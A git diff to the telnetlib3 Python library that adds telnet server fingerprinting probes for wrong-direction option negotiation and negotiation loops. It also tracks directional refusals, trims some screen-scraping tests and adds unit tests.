+ looped_options = await probe_server_loop_detection(
+ writer, probe_results, timeout=_PROBE_TIMEOUT
+ )
probe_time = time.time() - probe_time
# 5b. If server acknowledged MSSP but data hasn't arrived yet, wait.
@@ -625,7 +641,13 @@ async def _fingerprint_session(
}
# 7. Compute fingerprint once for save/name/display
- protocol_fp = _create_server_protocol_fingerprint(writer, probe_results, scan_type=scan_type)
+ protocol_fp = _create_server_protocol_fingerprint(
+ writer,
+ probe_results,
+ scan_type=scan_type,
+ wrong_dir_results=wrong_dir_results,
+ looped_options=looped_options,
+ )
protocol_hash = _hash_fingerprint(protocol_fp)
# 8. Save
@@ -665,10 +687,130 @@ async def _fingerprint_session(
writer.close()
+async def probe_server_wrong_direction(
+ writer: TelnetWriter, timeout: float = _PROBE_TIMEOUT
+) -> dict[str, str]:
+ """
+ Probe a server with wrong-direction requests to detect role-unaware implementations.
+
+ Sends ``IAC DO`` for client-only options (NAWS, TTYPE) -- a proper server
+ should refuse these with WONT. Sends ``IAC WILL`` for server-only options
+ (ECHO) -- a proper server should refuse these with DONT.
+
+ Temporarily sets ``writer._server = True`` so telnetlib3's own directional
+ checks do not refuse the wrong-direction replies before we can observe them.
+
+ :returns: Dict mapping option name to ``"wrong-accept"`` or ``"correct-refuse"``.
+ """
+ results: dict[str, str] = {}
+ saved_server = writer._server
+ writer._server = True
+
+ try:
+ # Send probes via _write to bypass iac() guards (which skip
+ # already-negotiated options).
+ for opt in _WRONG_DIRECTION_DO:
+ writer._write(IAC + DO + opt, escape_iac=False)
+ for opt in _WRONG_DIRECTION_WILL:
+ writer._write(IAC + WILL + opt, escape_iac=False)
+
+ # Wait for responses to arrive and be processed by the protocol engine
+ loop = asyncio.get_running_loop()
+ deadline = loop.time() + timeout
+ while loop.time() < deadline:
+ all_done = all(
+ writer.remote_option.get(opt) is not None for opt in _WRONG_DIRECTION_DO
+ ) and all(writer.local_option.get(opt) is not None for opt in _WRONG_DIRECTION_WILL)
+ if all_done:
+ break
+ await asyncio.sleep(0.05)
+
+ for opt in _WRONG_DIRECTION_DO:
+ name = _opt_byte_to_name(opt)
+ if writer.remote_option.enabled(opt):
+ results[name] = "wrong-accept"
+ else:
+ results[name] = "correct-refuse"
+
+ for opt in _WRONG_DIRECTION_WILL:
+ name = _opt_byte_to_name(opt)
+ if writer.local_option.enabled(opt):
+ results[name] = "wrong-accept"
+ else:
+ results[name] = "correct-refuse"
+
+ finally:
+ writer._server = saved_server
+
+ return results
+
+
+async def probe_server_loop_detection(
+ writer: TelnetWriter, probe_results: dict[str, _fps.ProbeResult], timeout: float = 0.3
+) -> list[str]:
+ """
+ Detect servers that would re-negotiate already-agreed options (telnet loop).
+
+ Saves the negotiation state for options the server already agreed to,
+ clears the cache, re-sends IAC DO / IAC WILL for those options, and
+ checks whether the server replies again. A well-behaved server ignores
+ redundant requests in the YES state; a loop-prone server replies again.
+
+ Checks both directions: re-DO'ing options the server already WILL'd,
+ and re-WILL'ing options the server already DO'd.
+
+ :returns: Sorted list of option names that would loop.
+ """
+ looped: set[str] = set()
+
+ for _label, opt_dict, probe_cmd, _reply_cmd in (
+ ("remote", writer.remote_option, DO, WILL),
+ ("local", writer.local_option, WILL, DO),
+ ):
+ agreed: dict[bytes, bool] = {}
+ for opt, enabled in opt_dict.items():
+ if enabled:
+ agreed[opt] = True
+ if not agreed:
+ continue
+
+ saved: dict[bytes, bool | None] = {}
+ for opt in agreed:
+ saved[opt] = opt_dict.get(opt)
+ opt_dict[opt] = None # type: ignore[assignment]
+ writer.pending_option.pop(probe_cmd + opt, None)
+
+ try:
+ writer._in_loop_detection = True
+ for opt in agreed:
+ writer.iac(probe_cmd, opt)
+
+ loop = asyncio.get_running_loop()
+ deadline = loop.time() + timeout
+ while loop.time() < deadline:
+ all_settled = all(opt_dict.get(opt) is not None for opt in agreed)
+ if all_settled:
+ break
+ await asyncio.sleep(0.05)
+
+ for opt in agreed:
+ if opt_dict.get(opt) is not None:
+ looped.add(_opt_byte_to_name(opt))
+
+ finally:
+ writer._in_loop_detection = False
+ for opt, value in saved.items():
+ opt_dict[opt] = value # type: ignore[assignment]
+ for opt in agreed:
+ writer.pending_option.pop(probe_cmd + opt, None)
+
+ return sorted(looped)
+
+
async def probe_server_capabilities(
writer: TelnetWriter,
options: list[tuple[bytes, str, str]] | None = None,
- timeout: float = 0.5,
+ timeout: float = _PROBE_TIMEOUT,
scan_type: str = "quick",
) -> dict[str, _fps.ProbeResult]:
"""
@@ -770,6 +912,9 @@ def _collect_server_option_states(writer: TelnetWriter) -> dict[str, dict[str, A
result: dict[str, Any] = {
"server_offered": server_offered,
"server_requested": server_requested,
+ "directional_refusals": sorted(
+ _opt_byte_to_name(opt) for opt in writer.directional_refusals
+ ),
}
if writer.environ_send_raw is not None:
@@ -779,7 +924,11 @@ def _collect_server_option_states(writer: TelnetWriter) -> dict[str, dict[str, A
def _create_server_protocol_fingerprint(
- writer: TelnetWriter, probe_results: dict[str, _fps.ProbeResult], scan_type: str = "quick"
+ writer: TelnetWriter,
+ probe_results: dict[str, _fps.ProbeResult],
+ scan_type: str = "quick",
+ wrong_dir_results: dict[str, str] | None = None,
+ looped_options: list[str] | None = None,
) -> dict[str, Any]:
"""
Create anonymized protocol fingerprint for a remote server.
@@ -798,12 +947,21 @@ def _create_server_protocol_fingerprint(
_opt_byte_to_name(opt) for opt, enabled in writer.local_option.items() if enabled
)
+ wrong_dir_offered = sorted(
+ name for name, status in (wrong_dir_results or {}).items() if status == "wrong-accept"
+ )
+
return {
"probed-protocol": "server",
"scan-type": scan_type,
"offered-options": offered,
"requested-options": requested,
"refused-options": refused,
+ "wrong-direction-offered": wrong_dir_offered,
+ "directional-refusals": sorted(
+ _opt_byte_to_name(opt) for opt in writer.directional_refusals
+ ),
+ "looped-negotiation": looped_options or [],
}
diff --git a/telnetlib3/stream_reader.py b/telnetlib3/stream_reader.py
index 849cec36..1cc3b0cf 100644
--- a/telnetlib3/stream_reader.py
+++ b/telnetlib3/stream_reader.py
@@ -480,14 +480,12 @@ async def readline(self) -> bytes:
And therefore, a line does not yield for a stream containing a
CR if it is not succeeded by NUL or LF.
- ================= =====================
- Given stream readline() yields
- ================= =====================
- ``--\r\x00---`` ``--\r``, ``---`` *...*
- ``--\r\n---`` ``--\r\n``, ``---`` *...*
- ``--\n---`` ``--\n``, ``---`` *...*
- ``--\r---`` ``--\r``, ``---`` *...*
- ================= =====================
+ Given a stream containing the following sequences, ``readline()`` yields:
+
+ * ``\\r\\x00`` -- yields at ``\\r``
+ * ``\\r\\n`` -- yields at ``\\r\\n``
+ * ``\\n`` -- yields at ``\\n``
+ * ``\\r`` -- yields at ``\\r``
If EOF is received before the termination of a line, the method will
yield the partially read string.
diff --git a/telnetlib3/stream_writer.py b/telnetlib3/stream_writer.py
index b3c1a19f..4b0f7492 100644
--- a/telnetlib3/stream_writer.py
+++ b/telnetlib3/stream_writer.py
@@ -266,6 +266,10 @@ def __init__(
#: that were rejected with WONT (unsupported options).
self.rejected_do: set[bytes] = set()
+ #: Set of option byte(s) refused due to directional mismatch
+ #: (e.g. WILL NAWS on client end, DO TTYPE on server end).
+ self.directional_refusals: set[bytes] = set()
+
#: Raw bytes of the last NEW_ENVIRON SEND payload, captured
#: for fingerprinting. ``None`` if no SEND was received.
self.environ_send_raw: Optional[bytes] = None
@@ -320,6 +324,11 @@ def __init__(
#: Whether MCCP3 compression is currently active (client→server).
self.mccp3_active: bool = False
+ #: Set True during loop-detection probing so that the "assuming
+ #: NAWS-enabled" fallback in :meth:`_handle_sb_naws` does not
+ #: produce false-positive re-negotiation signals.
+ self._in_loop_detection: bool = False
+
#: Sub-negotiation buffer
self._sb_buffer: collections.deque[bytes] = collections.deque()
@@ -769,7 +778,7 @@ def feed_byte(self, byte: bytes) -> bool:
elif self.cmd_received:
# parse 3rd and final byte of IAC DO, DONT, WILL, WONT.
- cmd, opt = self.cmd_received, byte # type: ignore[assignment]
+ cmd, opt = self.cmd_received, byte
self.log.debug("recv IAC %s %s", name_command(cmd), name_option(opt))
try:
if cmd == DO:
@@ -1909,6 +1918,7 @@ def handle_do(self, opt: bytes) -> bool:
):
self.log.debug("recv DO %s on server end, refusing.", name_command(opt))
self.iac(WONT, opt)
+ self.directional_refusals.add(opt)
elif self.client and opt in (LOGOUT,):
raise ValueError(f"cannot recv DO {name_command(opt)} on client end (ignored).")
elif opt == TM:
@@ -2075,6 +2085,7 @@ def handle_will(self, opt: bytes) -> None:
if opt in (NAWS, LINEMODE, SNDLOC) and self.client:
self.log.debug("recv WILL %s on client end, refusing.", name_command(opt))
self.iac(DONT, opt)
+ self.directional_refusals.add(opt)
return
# Client declines MUD protocols unless explicitly opted in.
if self.client and opt in _MUD_PROTOCOL_OPTIONS:
@@ -2138,6 +2149,7 @@ def handle_will(self, opt: bytes) -> None:
if not self.server and opt not in (CHARSET,):
self.log.debug("recv WILL %s on client end, refusing.", name_command(opt))
self.iac(DONT, opt)
+ self.directional_refusals.add(opt)
return
# First, we need to acknowledge WILL with DO for all options
@@ -2511,10 +2523,17 @@ def _handle_sb_naws(self, buf: collections.deque[bytes]) -> None:
"""Fire callback for IAC-SB-NAWS--SE (:rfc:`1073`)."""
buf.popleft()
if not self.remote_option.enabled(NAWS):
- self.log.info(
- "received IAC SB NAWS without receipt of IAC WILL NAWS -- assuming NAWS-enabled"
- )
- self.remote_option[NAWS] = True
+ if self._in_loop_detection:
+ self.log.debug(
+ "received IAC SB NAWS without WILL NAWS during loop detection;"
+ " not assuming NAWS-enabled"
+ )
+ else:
+ self.log.info(
+ "received IAC SB NAWS without receipt of IAC WILL NAWS"
+ " -- assuming NAWS-enabled"
+ )
+ self.remote_option[NAWS] = True
# note a similar formula:
#
# cols, rows = ((256 * buf[0]) + buf[1],
@@ -2782,7 +2801,7 @@ def _handle_sb_linemode_slc(self, buf: collections.deque[bytes]) -> None:
Callback handles IAC-SB-LINEMODE-SLC-.
Processes SLC command function triplets found in ``buf`` and replies
- with any changes. An empty reply is never sent — that would trigger
+ with any changes. An empty reply is never sent, that would trigger
an infinite echo loop between client and server.
"""
if len(buf) % 3 != 0:
diff --git a/telnetlib3/tests/test_client_shell.py b/telnetlib3/tests/test_client_shell.py
index 2e2758a3..968bd641 100644
--- a/telnetlib3/tests/test_client_shell.py
+++ b/telnetlib3/tests/test_client_shell.py
@@ -1001,7 +1001,7 @@ async def test_linemode_edit_via_telsh(bind_host: str, unused_tcp_port: int) ->
cmd = _client_cmd(bind_host, unused_tcp_port)
def _interact(master_fd: int, proc: "subprocess.Popen[bytes]") -> bytes:
- # Wait for the telsh prompt — LINEMODE negotiation has completed by then
+ # Wait for the telsh prompt, LINEMODE negotiation has completed by then
buf = _pty_read(master_fd, marker=b"tel:sh>", timeout=12.0)
# EC test: type "helo" + 0x7F (EC = delete-char) + "lo" + CR
# LinemodeBuffer: "helo" → EC deletes 'o' → "hel" + "lo" → "hello", CR sends it
diff --git a/telnetlib3/tests/test_fingerprinting.py b/telnetlib3/tests/test_fingerprinting.py
index d172dc86..3f40864c 100644
--- a/telnetlib3/tests/test_fingerprinting.py
+++ b/telnetlib3/tests/test_fingerprinting.py
@@ -923,209 +923,10 @@ async def test_server_shell_syncterm(monkeypatch):
assert "\x1b[0;40 D" in "".join(writer.written) and writer._closing
-class _ErrorReader:
- async def read(self, n):
- raise ConnectionError("gone")
-
-
-@pytest.mark.parametrize(
- "reader_data,expect_match",
- [
- pytest.param([b"\x1b[5;10R"], True, id="bytes_match"),
- pytest.param(["\x1b[3;7R"], True, id="str_match"),
- pytest.param([], False, id="timeout"),
- pytest.param([""], False, id="empty"),
- ],
-)
-@pytest.mark.asyncio
-async def test_read_until_cpr(reader_data, expect_match):
- match, buf = await fps._read_until_cpr(MockReader(reader_data), timeout=0.05)
- assert (match is not None) == expect_match
-
-
-@pytest.mark.asyncio
-async def test_read_until_cpr_connection_error():
- match, _ = await fps._read_until_cpr(_ErrorReader(), timeout=0.05)
- assert match is None
-
-
-@pytest.mark.asyncio
-async def test_make_send_recv():
- reader = MockReader([b"\x1b[1;1R"])
- writer = MockWriter()
- send_recv = fps._make_send_recv(reader, writer)
- match, _ = await send_recv("test\x1b[6n", timeout=0.05)
- assert match is not None and "test\x1b[6n" in writer.written
-
-
-@pytest.mark.parametrize(
- "pos_data,expect_cursor_restore",
- [
- pytest.param(b"\x1b[10;5R", True, id="with_position"),
- pytest.param("", False, id="no_position"),
- ],
-)
-@pytest.mark.asyncio
-async def test_shielded_probe(pos_data, expect_cursor_restore):
- reader = MockReader([pos_data, b"\x1b[1;1R"])
- writer = MockWriter()
- await fps._shielded_probe(
- reader, writer, number=1, name="Test", description="desc", sequence="payload", timeout=0.05
- )
- written = "".join(writer.written)
- assert "1. Test" in written and "ok" in written
- assert ("\x1b[10;5H" in written) == expect_cursor_restore
-
-
-@pytest.mark.parametrize(
- "reader_data,expected_count,expected_result",
- [
- pytest.param(
- [b"\x1bP1!~00AB\x1b\\\x1bP2!~0FFF\x1b\\"], 2, {1: 0x00AB, 2: 0x0FFF}, id="two_responses"
- ),
- pytest.param([], 5, {}, id="timeout"),
- pytest.param([b"\x1bP1!~0042\x1b\\"], 3, {1: 0x0042}, id="partial"),
- pytest.param(["\x1bP1!~00FF\x1b\\"], 1, {1: 0x00FF}, id="str_input"),
- pytest.param([""], 1, {}, id="empty"),
- ],
-)
-@pytest.mark.asyncio
-async def test_blast_collect(reader_data, expected_count, expected_result):
- results = await fps._blast_collect(MockReader(reader_data), expected_count, timeout=0.05)
- assert results == expected_result
-
-
-@pytest.mark.asyncio
-async def test_blast_collect_connection_error():
- assert await fps._blast_collect(_ErrorReader(), expected=1, timeout=0.05) == {}
-
-
-def _deccksr_responses(codes):
- return b"".join(f"\x1bP{c}!~{c:04X}\x1b\\".encode() for c in codes)
-
-
-_ALL_PRINTABLE = list(range(32, 127))
-
-
-@pytest.mark.asyncio
-async def test_build_checksum_lookup():
- reader = MockReader([_deccksr_responses(_ALL_PRINTABLE)])
- table = await fps._build_checksum_lookup(reader, MockWriter(), cal_row=1, usable_cols=200)
- assert len(table) == 95 and table[0x0020] == " " and table[0x0041] == "A"
-
-
-@pytest.mark.parametrize(
- "codes,usable_cols",
- [
- pytest.param(_ALL_PRINTABLE[:1], 200, id="incomplete"),
- pytest.param([c for c in _ALL_PRINTABLE if c != 65], 200, id="missing_A"),
- ],
-)
-@pytest.mark.asyncio
-async def test_build_checksum_lookup_fails(codes, usable_cols):
- reader = MockReader([_deccksr_responses(codes)])
- table = await fps._build_checksum_lookup(
- reader, MockWriter(), cal_row=1, usable_cols=usable_cols
- )
- assert table == {}
-
-
-@pytest.mark.asyncio
-async def test_build_checksum_lookup_batched():
- batch_size = 10
- entries = []
- for offset in range(0, len(_ALL_PRINTABLE), batch_size):
- entries.append(_deccksr_responses(_ALL_PRINTABLE[offset : offset + batch_size]))
- reader = MockReader(entries)
- table = await fps._build_checksum_lookup(
- reader, MockWriter(), cal_row=1, usable_cols=batch_size
- )
- assert len(table) == 95
-
-
-@pytest.mark.asyncio
-async def test_blast_scrape():
- lookup = {0x0041: "A", 0x0020: " "}
- resp = b"\x1bP0!~0041\x1b\\\x1bP1!~0020\x1b\\"
- result = await fps._blast_scrape(MockReader([resp]), MockWriter(), 1, 2, lookup, timeout=0.5)
- assert result.startswith("A")
-
-
-@pytest.mark.asyncio
-async def test_blast_scrape_unknown_checksum():
- lookup = {0x0041: "A", 0x0020: " "}
- resp = b"\x1bP0!~0041\x1b\\\x1bP1!~BEEF\x1b\\"
- result = await fps._blast_scrape(MockReader([resp]), MockWriter(), 1, 2, lookup, timeout=0.5)
- assert "A" in result and "?0x" in result
-
-
-@pytest.mark.parametrize(
- "reader_data,rows,cols,expect_result",
- [
- pytest.param([b"\x1bXCTerm:STS:10:Hello World \x1b\\"], 2, 10, True, id="success"),
- pytest.param(["\x1bXCTerm:STS:10:Hello \x1b\\"], 1, 10, True, id="str_input"),
- pytest.param([], 2, 10, False, id="timeout"),
- pytest.param([""], 1, 10, False, id="empty"),
- pytest.param([b"\x1bXCTerm:STS:10:AB\x1b\\"], 3, 10, True, id="short_content"),
- ],
-)
-@pytest.mark.asyncio
-async def test_scrape_screen_sts(reader_data, rows, cols, expect_result):
- result = await fps.scrape_screen_sts(MockReader(reader_data), MockWriter(), rows, cols, 0.05)
- if expect_result:
- assert result is not None and result["method"] == "sts"
- else:
- assert result is None
-
-
-def _scrape_reader(responses):
- """MockReader for scrape_screen: inserts "" for drain loop after first CPR."""
- return MockReader([responses[0], ""] + list(responses[1:]))
-
-
-_CAL_RESP = _deccksr_responses(_ALL_PRINTABLE)
-_CPR = b"\x1b[5;1R"
-_PROBE_OK = b"\x1bP9999!~0041\x1b\\" + _CPR
-_Z_VERIFY = f"\x1bP1!~{ord('Z'):04X}\x1b\\".encode() + _CPR
-
-
-@pytest.mark.parametrize(
- "responses,rows,cols",
- [
- pytest.param([_CPR, _CPR], 5, 96, id="no_decrqcra"),
- pytest.param(["", ""], 5, 96, id="no_initial_cpr"),
- pytest.param([_CPR, _PROBE_OK], 5, 96, id="lookup_fails"),
- pytest.param(
- [_CPR, _PROBE_OK, _CAL_RESP, b"\x1bP1!~FFFF\x1b\\" + _CPR], 5, 96, id="verify_fails"
- ),
- ],
-)
-@pytest.mark.asyncio
-async def test_scrape_screen_fails(responses, rows, cols):
- result = await fps.scrape_screen(_scrape_reader(responses), MockWriter(), rows, cols)
- assert result is None
-
-
-@pytest.mark.parametrize(
- "alt_same", [pytest.param(True, id="alt_same"), pytest.param(False, id="alt_differs")]
-)
-@pytest.mark.asyncio
-async def test_scrape_screen_success(alt_same):
- rows, cols = 1, 96
- normal_resp = _deccksr_responses(range(rows * cols))
- alt_resp = normal_resp if alt_same else b"\x1bP0!~ABCD\x1b\\" * (rows * cols)
- reader = _scrape_reader([_CPR, _PROBE_OK, _CAL_RESP, _Z_VERIFY, normal_resp, alt_resp])
- result = await fps.scrape_screen(reader, MockWriter(), rows, cols)
- assert result is not None and result["decrqcra"] is True
- assert ("screen_1" in result) != alt_same
-
-
class _MockFPServer:
- def __init__(self, exc=None, tasks=None, closing=False, term_label=None):
+ def __init__(self, exc=None, tasks=None, closing=False):
self._closing = closing
self.writer = MockWriter()
- if term_label:
- self.writer._tv_term_label = term_label
self._tasks = tasks or []
self._exc_set = None
self._eof_called = False
@@ -1164,7 +965,7 @@ def cancel(self):
raise RuntimeError("cancel failed")
tasks = [MockTask() for _ in range(n_tasks)]
- server = _MockFPServer(tasks=tasks, closing=closing, term_label="xterm")
+ server = _MockFPServer(tasks=tasks, closing=closing)
fps.FingerprintingServer.connection_lost(server, exc)
assert server._closing is True
if not closing:
@@ -1196,22 +997,18 @@ async def test_server_shell_with_linemode(monkeypatch):
@requires_unix
@pytest.mark.parametrize(
- "term,extra_opts,exit_code,expect_encoding",
+ "term,extra_opts,expect_encoding",
[
- pytest.param("xterm", {}, 0, None, id="normal"),
- pytest.param("mudlet", {"GMCP": True}, 0, None, id="mud_client"),
- pytest.param("xterm", {"ttype1": "MTTS 137"}, 0, None, id="mtts_mud"),
- pytest.param("xterm", {}, 100, None, id="attack_exit_code"),
- pytest.param("syncterm", {}, 0, "latin-1", id="syncterm_encoding"),
+ pytest.param("xterm", {}, None, id="normal"),
+ pytest.param("mudlet", {"GMCP": True}, None, id="mud_client"),
+ pytest.param("xterm", {"ttype1": "MTTS 137"}, None, id="mtts_mud"),
+ pytest.param("syncterm", {}, "latin-1", id="syncterm_encoding"),
],
)
@pytest.mark.asyncio
-async def test_server_shell_with_data_dir(
- monkeypatch, tmp_path, term, extra_opts, exit_code, expect_encoding
-):
+async def test_server_shell_with_data_dir(monkeypatch, tmp_path, term, extra_opts, expect_encoding):
monkeypatch.setattr(fps.asyncio, "sleep", _noop)
monkeypatch.setattr(fps, "DATA_DIR", str(tmp_path))
- monkeypatch.setattr(fps, "_HAS_TV_DETECT", False)
extra = {"peername": ("127.0.0.1", 12345), "TERM": term}
extra.update({k: v for k, v in extra_opts.items() if not isinstance(v, bool)})
@@ -1223,7 +1020,7 @@ async def test_server_shell_with_data_dir(
writer.remote_option[getattr(fps, k)] = v
async def pty_with_exit(reader, writer, exe, args, raw_mode=False):
- return exit_code
+ return 0
monkeypatch.setattr(server_pty_shell, "pty_shell", pty_with_exit)
await fps.fingerprinting_server_shell(MockReader([]), writer)
@@ -1237,7 +1034,6 @@ async def pty_with_exit(reader, writer, exe, args, raw_mode=False):
async def test_server_shell_connection_reset(monkeypatch, tmp_path):
monkeypatch.setattr(fps.asyncio, "sleep", _noop)
monkeypatch.setattr(fps, "DATA_DIR", str(tmp_path))
- monkeypatch.setattr(fps, "_HAS_TV_DETECT", False)
writer = MockWriter(
extra={"peername": ("127.0.0.1", 12345), "TERM": "xterm"},
@@ -1475,3 +1271,41 @@ def test_fingerprinting_post_script_delegates():
with patch("telnetlib3.fingerprinting_display.fingerprinting_post_script") as mock_fps:
fps.fingerprinting_post_script("/tmp/test.json")
mock_fps.assert_called_once_with("/tmp/test.json")
+
+
+@pytest.mark.asyncio
+async def test_probe_client_loop_detection_no_loop():
+ """Empty result when client does not re-negotiate already-agreed options."""
+ w = _probe_writer()
+ w.remote_option[fps.BINARY] = True
+ w.remote_option[fps.SGA] = True
+ probe_results = {}
+ result = await fps.probe_client_loop_detection(w, probe_results, timeout=0.01)
+ assert result == []
+
+
+@pytest.mark.asyncio
+async def test_probe_client_loop_detection_loops():
+ """Option names returned when client re-negotiates after redundant DO/WILL."""
+ w = _probe_writer()
+ w.remote_option[fps.BINARY] = True
+ # Override iac to simulate a loop-prone client that re-WILLs
+ orig_iac = w.iac
+
+ def _looping_iac(cmd, opt):
+ orig_iac(cmd, opt)
+ w.remote_option._values[opt] = True
+
+ w.iac = _looping_iac
+ probe_results = {}
+ result = await fps.probe_client_loop_detection(w, probe_results, timeout=0.01)
+ assert "BINARY" in result
+
+
+@pytest.mark.asyncio
+async def test_probe_client_loop_detection_no_agreed():
+ """Empty result when no options are agreed."""
+ w = _probe_writer()
+ probe_results = {}
+ result = await fps.probe_client_loop_detection(w, probe_results, timeout=0.01)
+ assert result == []
diff --git a/telnetlib3/tests/test_mccp.py b/telnetlib3/tests/test_mccp.py
index fdd3d66a..3f32b484 100644
--- a/telnetlib3/tests/test_mccp.py
+++ b/telnetlib3/tests/test_mccp.py
@@ -455,7 +455,7 @@ async def test_compressed_write_fallback_after_end(self):
server._mccp2_start()
compressed_write = transport.write
- # End compression — restores transport.write
+ # End compression, restores transport.write
server._mccp2_end()
# The closure should fallback to orig_write when compressor is None
diff --git a/telnetlib3/tests/test_pty_shell.py b/telnetlib3/tests/test_pty_shell.py
index 5f920268..a8108224 100644
--- a/telnetlib3/tests/test_pty_shell.py
+++ b/telnetlib3/tests/test_pty_shell.py
@@ -73,7 +73,7 @@ def _create(extra_info=None, capture_writes=False):
else:
writer.get_extra_info = MagicMock(side_effect=lambda k, d=None: extra_info.get(k, d))
# Ensure fn_encoding doesn't exist so _flush_output falls through to
- # get_extra_info("charset") — MagicMock auto-creates it as a truthy mock.
+ # get_extra_info("charset"), MagicMock auto-creates it as a truthy mock.
if hasattr(writer, "fn_encoding"):
del writer.fn_encoding
# Provide a real dict for remote_option so _schedule_ga works correctly.
diff --git a/telnetlib3/tests/test_server_api.py b/telnetlib3/tests/test_server_api.py
index 10be0905..826449a7 100644
--- a/telnetlib3/tests/test_server_api.py
+++ b/telnetlib3/tests/test_server_api.py
@@ -113,3 +113,45 @@ async def test_create_server_line_mode_default_false(bind_host, unused_tcp_port)
writer.write(IAC + WONT + TTYPE)
client = await asyncio.wait_for(server.wait_for_client(), 0.5)
assert client.line_mode is False
+
+
+async def test_enqueue_client_queue_full():
+ """_enqueue_client discards oldest entry when bounded queue is full."""
+ from telnetlib3.server import Server, _enqueue_client
+ from telnetlib3.server_base import BaseServer
+
+ class _TestProto(BaseServer):
+ def connection_made(self, transport):
+ pass
+
+ server = Server(None)
+ server._new_client = asyncio.Queue(maxsize=1)
+
+ p1 = _TestProto(shell=lambda _: None, _waiter_connected=asyncio.Future())
+ p1._waiter_connected.set_result(None)
+ _enqueue_client(server, p1)
+ assert server._new_client.qsize() == 1
+
+ p2 = _TestProto(shell=lambda _: None, _waiter_connected=asyncio.Future())
+ p2._waiter_connected.set_result(None)
+ _enqueue_client(server, p2)
+ assert server._new_client.qsize() == 1
+
+
+async def test_register_protocol_prunes_dead():
+ """_register_protocol removes closed protocols before appending."""
+ from telnetlib3.server import Server
+
+ class _FakeProto:
+ _closing = True
+ _waiter_connected = None
+
+ class _LiveProto:
+ _closing = False
+ _waiter_connected = asyncio.Future()
+
+ server = Server(None)
+ server._protocols = [_FakeProto()]
+ server._register_protocol(_LiveProto())
+ assert len(server._protocols) == 1
+ assert isinstance(server._protocols[0], _LiveProto)
diff --git a/telnetlib3/tests/test_server_fingerprinting.py b/telnetlib3/tests/test_server_fingerprinting.py
index 7943bdd9..fec6f2ae 100644
--- a/telnetlib3/tests/test_server_fingerprinting.py
+++ b/telnetlib3/tests/test_server_fingerprinting.py
@@ -55,6 +55,13 @@ def __init__(self, extra=None, will_options=None, wont_options=None):
self.protocol = _MockProtocol()
self._closing = False
self._menu_inline: bool = False
+ self.rejected_will: set[bytes] = set()
+ self.rejected_do: set[bytes] = set()
+ self.directional_refusals: set[bytes] = set()
+ self._server = True
+ self._encoding_explicit: bool = False
+ self._esc_inline: bool = False
+ self.pending_option = MockOption()
def get_extra_info(self, key, default=None):
return self._extra.get(key, default)
@@ -69,6 +76,9 @@ def iac(self, cmd, opt):
def write(self, data):
self._writes.append(data)
+ def _write(self, data, escape_iac=False):
+ self._writes.append(data)
+
async def drain(self):
pass
@@ -1437,3 +1447,65 @@ async def test_fingerprinting_shell_codepage_explicit_skips_utf8(tmp_path):
await _run_fp(reader, writer, tmp_path, environ_encoding="cp437")
assert b"1\r\n" not in writer._writes
assert writer.environ_encoding == "cp437"
+
+
+@pytest.mark.asyncio
+async def test_probe_server_wrong_direction_correct_refuse():
+ """Server correctly refuses wrong-direction DO/WILL with WONT/DONT."""
+ writer = MockWriter()
+ writer.remote_option[fps.NAWS] = False
+ writer.remote_option[fps.TTYPE] = False
+ writer.local_option[fps.ECHO] = False
+ results = await sfp.probe_server_wrong_direction(writer, timeout=0.01)
+ assert results["NAWS"] == "correct-refuse"
+ assert results["TTYPE"] == "correct-refuse"
+ assert results["ECHO"] == "correct-refuse"
+
+
+@pytest.mark.asyncio
+async def test_probe_server_wrong_direction_wrong_accept():
+ """Server accepts wrong-direction DO/WILL (role-unaware)."""
+ writer = MockWriter()
+ writer.remote_option[fps.NAWS] = True
+ writer.remote_option[fps.TTYPE] = True
+ writer.local_option[fps.ECHO] = True
+ results = await sfp.probe_server_wrong_direction(writer, timeout=0.01)
+ assert results["NAWS"] == "wrong-accept"
+ assert results["TTYPE"] == "wrong-accept"
+ assert results["ECHO"] == "wrong-accept"
+
+
+@pytest.mark.asyncio
+async def test_probe_server_loop_detection_no_loop():
+ """Empty result when server does not re-negotiate already-agreed options."""
+ writer = MockWriter()
+ writer.remote_option[fps.BINARY] = True
+ probe_results = {}
+ result = await sfp.probe_server_loop_detection(writer, probe_results, timeout=0.01)
+ assert result == []
+
+
+@pytest.mark.asyncio
+async def test_probe_server_loop_detection_loops():
+ """Option names returned when server re-negotiates after redundant DO/WILL."""
+ writer = MockWriter()
+ writer.remote_option[fps.BINARY] = True
+ orig_iac = writer.iac
+
+ def _looping_iac(cmd, opt):
+ orig_iac(cmd, opt)
+ writer.remote_option[opt] = True
+
+ writer.iac = _looping_iac
+ probe_results = {}
+ result = await sfp.probe_server_loop_detection(writer, probe_results, timeout=0.01)
+ assert "BINARY" in result
+
+
+@pytest.mark.asyncio
+async def test_probe_server_loop_detection_no_agreed():
+ """Empty result when no options are agreed."""
+ writer = MockWriter()
+ probe_results = {}
+ result = await sfp.probe_server_loop_detection(writer, probe_results, timeout=0.01)
+ assert result == []
diff --git a/telnetlib3/tests/test_stream_writer_full.py b/telnetlib3/tests/test_stream_writer_full.py
index 9249e52e..4ea409c0 100644
--- a/telnetlib3/tests/test_stream_writer_full.py
+++ b/telnetlib3/tests/test_stream_writer_full.py
@@ -1458,6 +1458,16 @@ def test_send_naws_and_handle_naws():
assert seen["sz"] == (200, 100)
+def test_handle_sb_naws_defers_during_loop_detection():
+ """SB NAWS during loop detection does not set remote_option to avoid false positives."""
+ ws, _, _ = new_writer(server=True)
+ ws._in_loop_detection = True
+ payload = struct.pack("!HH", 100, 200)
+ buf = collections.deque([NAWS, payload[0:1], payload[1:2], payload[2:3], payload[3:4]])
+ ws._handle_sb_naws(buf)
+ assert not ws.remote_option.enabled(NAWS)
+
+
def test_handle_sb_lflow_toggles():
ws, _, _ = new_writer(server=True)
ws.local_option[LFLOW] = True
@@ -1697,3 +1707,19 @@ def test_receive_status_mixed_do_will_and_sb(caplog):
assert any("agreed" in msg.lower() for msg in caplog.messages)
assert any("NAWS 132x43" in msg for msg in caplog.messages)
assert any("disagree" in msg.lower() for msg in caplog.messages)
+
+
+def test_handle_do_server_directional_refusal():
+ """Server end refuses DO for client-only options, tracked in directional_refusals."""
+ w, t, _ = new_writer(server=True)
+ w.handle_do(TTYPE)
+ assert t.writes[-1] == IAC + WONT + TTYPE
+ assert TTYPE in w.directional_refusals
+
+
+def test_handle_will_client_directional_refusal():
+ """Client end refuses WILL for server-only options, tracked in directional_refusals."""
+ w, t, _ = new_writer(server=False, client=True)
+ w.handle_will(TTYPE)
+ assert t.writes[-1] == IAC + DONT + TTYPE
+ assert TTYPE in w.directional_refusals
